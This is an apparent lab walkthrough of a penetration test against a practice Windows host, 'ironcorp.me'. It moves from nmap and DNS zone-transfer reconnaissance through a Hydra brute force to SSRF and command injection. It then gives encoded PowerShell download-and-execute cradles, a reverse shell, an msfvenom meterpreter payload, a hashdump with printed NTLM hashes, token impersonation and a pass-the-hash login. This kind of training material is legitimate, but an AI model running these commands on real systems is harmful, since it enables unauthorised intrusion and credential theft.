Complex Attack Types: Sample Scenarios 41

4 months ago 39

BOOK THIS SPACE FOR AD

ARTICLE AD

In this article of the series, we will infiltrate the opposing system using our intelligence and penetration abilities and explain every attack we perform in the lab environment. This article will allow you to improve your penetration abilities in many ways.

You may see that the IPs change from time to time, do not care, we will be using different machines as we progress. The entire methodology is the same.

If your keyboard is ready, let’s get started cyberpunks!

First of all, save the values and IPs you use most on the shell.

output

Now register the target machine on local DNS. We will use our /etc/hosts/ file to achieve this.

output

We have completed the stage. We can move on to the exploration section.

We can reveal the structure, network system and open ports of the target machine using the nmap tool: nmap -sV -sC -oN nmap_general_result.txt -T4 -A -Pn -p- --min-rate=300 --max-retries=3 $target_ip

sV: Service/version detection. Nmap attempts to determine the version of the services running on open ports.-sC: Runs a set of standard scripts against the target. These scripts are equivalent to using --script=default.-oN nmap_general_result.txt: Outputs the results of the scan to a file named nmap_general_result.txt in normal format.-Pn: Treats all hosts as online — skips host discovery.--min-rate=300: Ensures a minimum rate of 300 packets per second.--max-retries=3: Limits the number of retries for a port scan to 3.-p-: Scans all 65535 ports.-A: Enables OS detection, version detection, script scanning, and traceroute.-T4: Sets the timing template to level 4 (aggressive).$target_ip: Placeholder for the target IP address you want to scan.

This gives you a comprehensive result, you have to have some patience for this.

output

As you can see, we have obtained the details and other notes that some ports are open. Don’t forget to record all of these in the real scenario.

53/tcp open domain
135/tcp open msrpc Microsoft Windows RPC
3389/tcp open ms-wbt-server Microsoft Terminal Services
8080/tcp open http Microsoft IIS httpd 10.0
11025/tcp open http Apache HTTPD 2.4.41
49667/tcp filtered msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC

53/tcp open domain:

Service: Domain Name System (DNS)Description: DNS is used to translate domain names into IP addresses. Running on port 53, it is typically a DNS server.Security Note: Ensure the DNS service is properly secured to prevent DNS spoofing and amplification attacks.

135/tcp open msrpc Microsoft Windows RPC:

Service: Microsoft RPC (Remote Procedure Call)Description: Used for remote management and other communications between Windows applications. RPC is a crucial part of many Windows services.Security Note: Vulnerabilities in RPC services have historically been exploited. Ensure this service is properly secured and patched.

3389/tcp open ms-wbt-server Microsoft Terminal Services:

Service: Remote Desktop Protocol (RDP)Description: Provides remote access to the desktop of a Windows computer. Used for remote administration and support.Security Note: RDP should be secured with strong passwords, two-factor authentication, and ideally, restricted access. Vulnerabilities in RDP have been targets for attacks such as ransomware.

8080/tcp open http Microsoft IIS httpd 10.0:

Service: HTTP (Web service)Description: Often used as an alternative port for web servers or web applications. In this case, it’s running on Microsoft IIS (Internet Information Services).Security Note: Ensure the web server is up-to-date and secured. Consider HTTPS for secure communication.

1025/tcp open http Apache HTTPD 2.4.41:

Service: HTTP (Web service)Description: Running Apache HTTP Server, version 2.4.41.Security Note: Keep the Apache server updated and configured securely. Consider HTTPS for secure communication.

49667/tcp filtered msrpc Microsoft Windows RPC:

Service: Microsoft RPC (Remote Procedure Call)Description: The port is filtered, indicating that a firewall or security device is blocking access to it.Security Note: Verify the purpose of this port and whether it should be accessible. Filtering indicates some security measures are in place.

49670/tcp open msrpc Microsoft Windows RPC:

Service: Microsoft RPC (Remote Procedure Call)Description: Another instance of the RPC service.Security Note: Ensure all RPC services are secured and patched. Restrict access to necessary IP addresses only.

You can make a specific nmap query on these ports before proceeding to the next step: nmap -p 53,135,3389,8080,11025,49667,49670 --script=vuln -A -T4 -sV $target_ip -oN nmap_spec_result.txt

output

Now you should take a good look at the nmap output produced for the ports connected to the HTTP servers. There are hidden pages and endpoints that would not normally be safe for them. We will try another approach to get these pages in a moment.

Now the DNS port is open and we need to look at ways to discover it. Use dig axfr @10.10.126.48 ironcorp.me

axfr: Stands for “Asynchronous Full Transfer Zone.” It is used to request a zone transfer from the DNS server. A zone transfer allows you to retrieve the entire DNS zone file, which includes all the DNS records for a domain.

output

As you can see, we received additional domains. You need to save the defined values in your /etc/hosts file.

output

You can find out whether DNS Zone transfer is possible with this command: nmap --script=dns-zone-transfer -p 53 $target_ip -Pn if you need.

output

Now let’s be a little sneaky and do an alternative check. You can check if we can leave a TXT record on DNS.

Use it:

nsupdate
> server 10.10.126.48
> update add test.ironcorp.me 5 TXT "HELLO WORLD"
> send

output

Now control it. We will use nslookup for it.

Use it:

└─# nslookup
> server 10.10.126.48
Default server: 10.10.126.48
Address: 10.10.126.48#53
> set type=txt
> test.ironcorp.me

output

Yes, we managed to add a TXT, now save it and add it to your list for future use. Maybe this will allow us to make a record on DNS for our own IP value in the future.

The admin page has a security mechanism, it asks us for a username and password. Now we can try a brute-force for this: hydra -l admin -P /usr/share/wordlists/seclists/Passwords/Common-Credentials/best1050.txt -s 11025 admin.ironcorp.me http-get

Don’t be surprised, most systems engineers are too lazy to change their username…

output

Really! We got that password.

Now we can log in to the panel.

output

We are in now.

Now it’s time to review the page. Feel free to use developer tools through your browser. It is recommended to obtain and save values such as Session ID and cookies.

output

The input section seems to have been prepared quite inexperiencedly, take note. It is “?r=”.

output

Get “storage” section.

output

No storage… Get “network” section. You may be able to get endpoints.

output

Nope… Keep going.

output

Save any information you get from here.

Try typing something in the “Search” section.

output

Yes, the format is as we expected: ?r=hello+world#

Now we can do some interesting experiments. Try to get “https://google.com”

output

No error, but connection is still running… So what happens if we try to pull a file? Try any file from internet.

output

We got an error, but our URL scheme gave us a message.

There is a transfer structure here. In other words, we can make requests to IPs registered in the internal system. Try for internal.ironcorp.me now.

output

Yes! We got this.

So what is “here”?

output

Have you seen the URL? We were redirected here, but we don’t have access as of now. We can achieve this again via the admin page. Note that.

output

Yes. Our theory was proven right. Save this name: Equinox.

So, can we add a file from our own system here? Try it.

First activate your own HTTP server: python3 -m http.server

output

Now create a random file.

output

Let’s try to get our file through the admin page we have captured.

output

Very exciting! Our attack scenario is increasing considerably. Note that too.

Now let’s go into some details, this structure we obtained seems to have SSRF vulnerability. Server-Side Request Forgery (SSRF) is a type of web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker’s choosing. This can lead to a variety of potential impacts, such as leaking sensitive information, accessing internal services, or even executing remote code depending on the server’s configuration and capabilities.

When you examine the “Response Header” section, it says PHP version. You can conduct exploit research.

output

You should always evaluate what’s here.

Now we can see if we can convert it to RCE. Remote Code Execution (RCE) is a type of security vulnerability that allows an attacker to execute arbitrary code on a remote system. This can lead to severe consequences, as it enables attackers to take full control of the compromised system, potentially leading to data theft, system damage, and further exploitation of the network.

Try it.

output

A value can be entered after the expression “Equinox”. Now let’s manipulate this a little bit.

output

Did you see? We were able to run the command and obtain our system name: nt authority\system

Now we can move this to the curl environment.

Note that:

GET /?r=http://internal.ironcorp.me:11025/name.php?name=test|whoami HTTP/1.1
Host: admin.ironcorp.me:11025
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46cGFzc3dvcmQxMjM=
Connection: keep-alive
Upgrade-Insecure-Requests: 1

Check “Authorization: Basic YWRtaW46cGFzc3dvcmQxMjM=” .

output

We have an authorization encoded in Base64.

Use it curl --user admin:**** 'http://admin.ironcorp.me:11025/?r=http://internal.ironcorp.me:11025/name.php?name=test|whoami'

output

We are in a Windows environment, let’s see if we can get other information. Use curl --user admin:**** 'http://admin.ironcorp.me:11025/?r=http://internal.ironcorp.me:11025/name.php?name=test|systeminfo'

output

We can get anything we want…

It’s time to journey into some more dangerous waters.

First, download the following file to your local: https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

output

We have previously activated our HTTP server, if it is not active, do not forget to activate it again.

Now we need to pass the following command to the other side: powershell.exe -c iex(new-object net.webclient).downloadstring(‘http://10.10.7.103:8000/power_tcp.ps1')

First of all, we may need to do this by URL encoding. Use it https://www.urlencoder.org/ if you need.

powershell.exe%20-c%20iex%28new-object%20net.webclient%29.downloadstring%28%27http%3A%2F%2F10.10.7.103%3A8000%2Fpower_tcp.ps1%27%29

If that doesn’t work, you need a different hex layout. You can write python code for this. Just double it.

import urllib.parse

command = "powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.>
encoded_command = urllib.parse.quote(command)
double_encoded = urllib.parse.quote(encoded_command)
print(encoded_command)
print("\n\n")
print(double_encoded)

output

You can also do this through Brup.

Let’s try.

output

Could not understand… It looks like there is an error for our URL format…

Open Burp now.

output

Decode it for URL. And double it.

output

We have:

%25%37%30%25%36%66%25%37%37%25%36%35%25%37%32%25%37%33%25%36%38%25%36%35%25%36%63%25%36%63%25%32%65%25%36%35%25%37%38%25%36%35%25%32%30%25%32%64%25%36%33%25%32%30%25%36%39%25%36%35%25%37%38%25%32%38%25%36%65%25%36%35%25%37%37%25%32%64%25%36%66%25%36%32%25%36%61%25%36%35%25%36%33%25%37%34%25%32%30%25%36%65%25%36%35%25%37%34%25%32%65%25%37%37%25%36%35%25%36%32%25%36%33%25%36%63%25%36%39%25%36%35%25%36%65%25%37%34%25%32%39%25%32%65%25%36%34%25%36%66%25%37%37%25%36%65%25%36%63%25%36%66%25%36%31%25%36%34%25%37%33%25%37%34%25%37%32%25%36%39%25%36%65%25%36%37%25%32%38%25%32%37%25%36%38%25%37%34%25%37%34%25%37%30%25%33%61%25%32%66%25%32%66%25%33%31%25%33%30%25%32%65%25%33%31%25%33%30%25%32%65%25%33%37%25%32%65%25%33%31%25%33%30%25%33%33%25%33%61%25%33%38%25%33%30%25%33%30%25%33%30%25%32%66%25%37%30%25%36%66%25%37%37%25%36%35%25%37%32%25%35%66%25%37%34%25%36%33%25%37%30%25%32%65%25%37%30%25%37%33%25%33%31%25%32%37%25%32%39

output

Forward it.

output

Yes! We uploaded it to the target system.

We need to look at how to make this work. Time to encode for:

powershell.exe ./power_tcp.ps1 -Reverse -IPAddress 10.10.7.103 -Port 11011

We have:

%25%37%30%25%36%66%25%37%37%25%36%35%25%37%32%25%37%33%25%36%38%25%36%35%25%36%63%25%36%63%25%32%65%25%36%35%25%37%38%25%36%35%25%32%30%25%32%65%25%32%66%25%37%30%25%36%66%25%37%37%25%36%35%25%37%32%25%35%66%25%37%34%25%36%33%25%37%30%25%32%65%25%37%30%25%37%33%25%33%31%25%32%30%25%32%64%25%35%32%25%36%35%25%37%36%25%36%35%25%37%32%25%37%33%25%36%35%25%32%30%25%32%64%25%34%39%25%35%30%25%34%31%25%36%34%25%36%34%25%37%32%25%36%35%25%37%33%25%37%33%25%32%30%25%33%31%25%33%30%25%32%65%25%33%31%25%33%30%25%32%65%25%33%37%25%32%65%25%33%31%25%33%30%25%33%33%25%32%30%25%32%64%25%35%30%25%36%66%25%37%32%25%37%34%25%32%30%25%33%31%25%33%31%25%33%30%25%33%31%25%33%31

Before forwarding this, put your machine in listening mode on the port you specified: nc -nlvp 11011

output

Firewalls may not allow you to run .ps1 files directly.

So you may need to send this command before importing it:

powershell.exe -noprofile -executionpolicy bypass -file .\power_tcp.ps1

Encode it first.

We have:

Send it.

output

Now you can send the main payload:

If this doesn’t work, add this to the end of the file you send.

output

Try sending the file again.

output

We got reverse now!

output

You should look at the privilege level.

output

Yeap!

Now let’s look at other users.

output

There is another authorization at a higher level than admin privileges… We got “permission denied”.

At this stage, we need the privilege escalation method.

Now check permission for SuperAdmin: get-acl C:\Users\SuperAdmin | fl

output

Path: The path of the directory for which the ACL is being displayed.

Path : Microsoft.PowerShell.Core\FileSystem::C:\Users\SuperAdmin

Owner: The owner of the directory.

Owner : NT AUTHORITY\SYSTEM

Group: The primary group of the directory.

Group : NT AUTHORITY\SYSTEM

Access: The access control entries (ACEs) for the directory, listing the permissions granted or denied to users or groups.

Access : BUILTIN\Administrators Deny FullControlThe BUILTIN\Administrators group is denied FullControl.

S-1-5-21-297466380-2647629429-287235700-1000 Allow FullControl

The user or group with the Security Identifier (SID) S-1-5-21-297466380-2647629429-287235700-1000 is allowed FullControl.

Time for some slyness here. First, we need to check if there is access to the “Administrator” user.

output

Yes, we have permission as expected.

Now let’s try to create a payload on the local machine and transfer it here.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.7.103 LPORT=12011 -f psh -o meterpreter_64.ps1

output

Now we need to make some configurations via meterpreter. Use it.

msfconsole -x "use multi/handler;set payload windows/x64/meterpreter/reverse_tcp; set lhost 10.10.7.103; set lport 12011; set ExitOnSession false; exploit -j"

output

Now it’s time to transfer it to the target system and use it. Here, check that your HTTP server is still active and that you have given the correct file name.

powershell -command "& { iwr 10.10.7.103:8000/meterpreter_64.ps1 -OutFile C:\Users\Administrator\Desktop\meterpreter_64.ps1 }"

Run it.

output

Activate this powershell script in the specified location.

Import-Module .\meterpreter_64.ps1

output

Yeap! Session is active and we have it.

Open it now.

output

Your abilities speak here. Use hashdump command via meterpreter.

output

Did you see?

Each line follows this pattern:

<username>:<RID>:<LM-hash>:<NTLM-hash>:::<username>: Username of the account.<RID>: Relative Identifier (RID) of the account.<LM-hash>: LM hash of the account's password (empty or aad3b435b51404eeaad3b435b51404ee indicates no LM hash).<NTLM-hash>: NTLM hash of the account's password.:::: End of line marker for each entry.Admin: RID 1003, NTLM hash: 25f46396c818314f78cafba3fd1e5596
Administrator: RID 500, NTLM hash: 2182eed0101516d0a206b98c579565e6
DefaultAccount: RID 503, NTLM hash: 31d6cfe0d16ae931b73c59d7e0c089c0
Equinox: RID 1001, NTLM hash: e40d1ba38afa3fe8264af701b7ca9b7c
Guest: RID 501, NTLM hash: 31d6cfe0d16ae931b73c59d7e0c089c0
Sunlight: RID 1002, NTLM hash: d54b9ad80935dd57769e8eae3e655927

NTLM hashes are typically used for authentication in Windows environments.

Now use use incognito ,then list_tokens -u

output

Let’s use impersonate_token "WIN-8VMBKF3G815\Admin"

output

We are moving on to the final stage. Get shell.

output

We got that!

Let’s talk about another different method. You have the NTLM hashes, you can also access them with the following command: evil-winrm -i 10.10.230.120 -u <USER_NAME> -H <NLTM_HASH>

If possible…

Don’t give up on hacking.

Code for good.

^-^

Read Entire Article